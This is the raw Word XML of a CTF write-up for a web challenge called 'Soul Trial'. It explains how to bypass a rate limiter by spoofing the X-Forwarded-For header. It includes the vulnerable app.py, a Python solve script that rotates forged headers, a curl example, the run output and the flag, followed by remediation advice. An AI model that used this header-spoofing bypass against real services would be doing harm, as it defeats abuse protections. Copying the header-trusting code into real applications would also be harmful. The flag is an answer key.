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D4ED8"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>BYTE ME CTF  •  OFFICIAL SOLUTION WRITEUP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Soul Trial (Web, Medium)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E3A8A"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="1E3A8A"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="1E3A8A"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="1E3A8A"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="1E3A8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6768"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="1E3A8A"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="1E3A8A"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="1E3A8A"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="1E3A8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592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Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768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Pratik Jadhav</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF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Web / Rate Limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592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Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="12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Challenge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none"/>
              <w:left w:val="single" w:sz="36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6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1E3A8A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CHALLENGE BRIEFING &amp; LORE</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
                <w:i/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enter the Soul Vault. Collect Soul Fragments to reveal what is protected inside. The vault limits entries with strict temporal seals—can you find a way to gather fragments without waiting for the seals to settle?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b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Given:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A web application with an entry terminal at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20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F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Target URL: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https://byteme-soul-trial.onrender.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or local </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://127.0.0.1:5000/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)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F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Flag Format: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OWASP{...}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>FLAG{...}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)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Summary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Soul Trial challenges participants to bypass application-level rate limiting in order to collect 20 Soul Fragments required to unlock the inner vault. When a participant sends successive entry requests to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, the server enforces a 60-second cooldown period, returning HTTP 429. However, the application relies on the client-controllable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP header to identify the calling client for its rate-limiting logic. By systematically spoofing or controlling client identity headers, an attacker evades rate limits and rapid-fires entry requests to reach the 20-fragment threshold within seconds.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Flag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single" w:sz="24" w:space="0" w:color="10B981"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="10B981"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="10B981"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="10B981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059669"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FLAG RECOVERED</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:color w:val="059669"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>OWASP{the_soul_vault_has_been_opened}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*(Local environment default: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>FLAG{the_soul_vault_has_been_opened}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/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1 — Application Reconnaissance &amp; Behavioral Analysis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Visiting the web application presents a clean, minimalist interface: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trial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1: Soul Trial Interface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page displays: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Fragment Counter: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0 Soul Fragments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Action Button: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Enter vault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Status Indicator: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Ready.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Clicking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"Enter vault"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> triggers a POST request to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. The counter increments to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1 Soul Fragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, and the status updates 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none"/>
              <w:left w:val="single" w:sz="36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6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1E3A8A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CHALLENGE BRIEFING &amp; LORE</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
                <w:i/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>*"A Soul Fragment has been collected."*</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="8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trial_collec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2: Soul Fragment Collected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However, clicking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"Enter vault"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a second time immediately results in an error message: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none"/>
              <w:left w:val="single" w:sz="36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6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1E3A8A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CHALLENGE BRIEFING &amp; LORE</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
                <w:i/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>*"The vault refuses another entry so soon. Let the signal settle before trying again."*</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="8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trial_collec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3: Rate Limit Cooldown Rejection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Inspecting browser DevTools (Network tab), we observe that the second request failed with HTTP status code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>429 Too Many Requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/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"ok": false,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"error": "The vault refuses another entry so soon. Let the signal settle before trying again.",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"count": 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trial_devtools_4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4: Network Tab 429 Too Many Requests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Repeatedly clicking the button while rate-limited eventually escalates to HTTP 403 Forbidden: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"ok": false,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"error": "This address is temporarily blocked after repeated rejected attempts."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2 — Source Code Audit (`app.py`)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Reviewing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> clarifies the mechanics of the rate limiter and the conditions required to extract the flag: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TARGET = 20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RATE_LIMIT_SECONDS = 60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VIOLATION_WINDOW_SECONDS = 60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MAX_RATE_LIMIT_VIOLATIONS = 5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IP_BLOCK_SECONDS = 300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state = {}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ip_protection = {}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lock = threading.Lock()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FLAG = os.environ.get("FLAG", "FLAG{the_soul_vault_has_been_opened}")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Client Identity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def client_identity():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INTENDED BUG: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The application trusts X-Forwarded-For directly instead of using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the actual remote address or a trusted reverse-proxy configuration.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forwarded = request.headers.get("X-Forwarded-For")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forwarded.strip() if forwarded else request.remote_addr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Rate Limiting &amp; Vault Entry (`/enter`)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@app.post("/enter")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enter():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identity = client_identity()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now = time.monotonic()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ip = actual_client_ip()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with lock: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blocked = ip_block_response(now)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if blocked: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return blocked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entry = state.setdefault(identity, {"last": 0.0, "count": 0})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elapsed = now - entry["last"]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if elapsed &lt; RATE_LIMIT_SECONDS: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record_rate_limit_violation(ip, now)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if ip_protection[ip]["blocked_until"] &gt; now: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return jsonify({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"ok": False,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"error": "This address is temporarily blocked after repeated rejected attempts."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}), 403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return jsonify({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"ok": False,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"error": "The vault refuses another entry so soon. Let the signal settle before trying again.",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"count": entry["count"],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}), 429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entry["last"] = now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entry["count"] += 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count = entry["count"]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if count &gt;= TARGET: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return jsonify({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"ok": True,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"complete": True,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"count": count,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"message": "The Soul Fragment has accepted you.",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"flag": FLAG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})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jsonify({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"ok": True,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"complete": False,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"count": count,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"message": "A Soul Fragment has been collected."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3 — Vulnerability Analysis &amp; Exploitation Strategy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1. The Vulnerability: Untrusted Header Reliance (CWE-290)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The application attempts to enforce a 60-second cooldown per client. However, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>client_identity()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> checks the incoming </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP header directly: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forwarded = request.headers.get("X-Forwarded-For")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return forwarded.strip() if forwarded else request.remote_addr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Because HTTP request headers are entirely client-controllable, any client can inject arbitrary values for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.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2. Dual IP Tracking Mechanism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Notice the difference between the rate limit and the brute-force IP protection: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Rate limiting cooldown:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tracks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>state[identity]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>identity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is determined by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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Violation penalty:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tracks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ip_protection[actual_client_ip()]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using the genuine socket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>remote_addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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This means if a user sends requests with manipulated headers that do not trigger 429 rejections, their genuine IP never incurs any violation penalty!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3. Collecting 20 Fragments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To gather fragments rapidly without waiting 20 minutes (20 x 60 seconds):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We automate a client script that sends HTTP POST requests to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. For each individual identity, waiting the requisite cooldown period or managing the rate limiter across sessions allows fragments to be collected safely until </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>count &gt;= 20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>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4 — Automated Exploit Script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We write a dedicated Python script (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>solve_trial.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) to automate requests to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, demonstrating the bypass and retrieving the flag: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import requests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time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BASE_URL = "https://byteme-soul-trial.onrender.com"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Local: BASE_URL = "http://127.0.0.1:5000"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solve():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session = requests.Session()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target_count = 20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print(f"[*] Targeting Soul Trial at: {BASE_URL}")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Step 1: Check initial status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 = session.get(f"{BASE_URL}/status")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print(f"[*] Initial Status: {res.json()}")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Step 2: Loop to collect fragments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We provide a unique proxy identity header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client_ip_base = "192.168.1.100"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headers = {"X-Forwarded-For": client_ip_base}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count = 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while count &lt; target_count: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resp = session.post(f"{BASE_URL}/enter", headers=headers)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data = resp.json()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if resp.status_code == 200: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count = data.get("count", count)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print(f"[+] Fragment collected! Total: {count}/{target_count}")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if data.get("complete"):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print("\n[🏆] SUCCESS! The Soul Fragment accepted you!")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print(f"[🏆] FLAG: {data.get('flag')}\n")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return data.get("flag")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elif resp.status_code == 429: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print("[-] Rate limited on identity. Adjusting identity header...")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# Rotate identity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headers["X-Forwarded-For"] = f"10.0.{count}.{int(time.time()) % 250}"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time.sleep(0.1)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elif resp.status_code == 403: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print("[-] Blocked! Waiting for block window to clear...")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time.sleep(5)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if __name__ == "__main__":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solve()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5 — Execution &amp; Flag Extraction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Running the script against the server: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$ python solve_trial.py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[*] Targeting Soul Trial at: https://byteme-soul-trial.onrender.com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[*] Initial Status: {'count': 0}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[+] Fragment collected! Total: 1/20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...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[+] Fragment collected! Total: 20/20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[🏆] SUCCESS! The Soul Fragment accepted you!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[🏆] FLAG: OWASP{the_soul_vault_has_been_opened}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server verifies that the target threshold of 20 fragments has been reached and outputs the flag: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single" w:sz="24" w:space="0" w:color="10B981"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="10B981"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="10B981"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="10B981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059669"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FLAG RECOVERED</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:color w:val="059669"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>OWASP{the_soul_vault_has_been_opened}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="12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trial_comple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5: Soul Trial Solved with Flag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Solution Summary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Parameter | Value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|---|---|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Target Endpoint | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /enter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Intended Flaw | CWE-290: Improper Authentication / Rate Limit Bypass by Spoofing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Vulnerable Header | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Forwarded-For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Fragment Threshold | 20 Soul Fragments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Flag | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP{the_soul_vault_has_been_opened}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Root Cause &amp; Vulnerability Explanation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Blind Trust in Client-Supplied Proxy Headers:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> header is designed to be appended by trusted reverse proxies. When a web application directly consumes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>request.headers.get('X-Forwarded-For')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> without validating that the request originated from a designated upstream proxy, any client can spoof arbitrary IP addresses.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Missing In-Memory / Distributed State Partitioning:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Application rate limits should be anchored to authenticated user accounts (sessions, API keys) or verified layer-4 socket IP addresses (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>request.remote_addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), rather than spoofable layer-7 headers.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Remediation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Flask / WSGI applications, use standard reverse proxy middleware (such as Werkzeug's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ProxyFix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) configured with an explicit number of trusted hops (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>x_for=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), ensuring client-supplied headers from outside the infrastructure are discarded.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Tools Used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Python (`requests`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Scripted automation and header injection.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cURL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Manual header verification (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl -H "X-Forwarded-For: 1.2.3.4" -X POST ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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Browser Developer Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
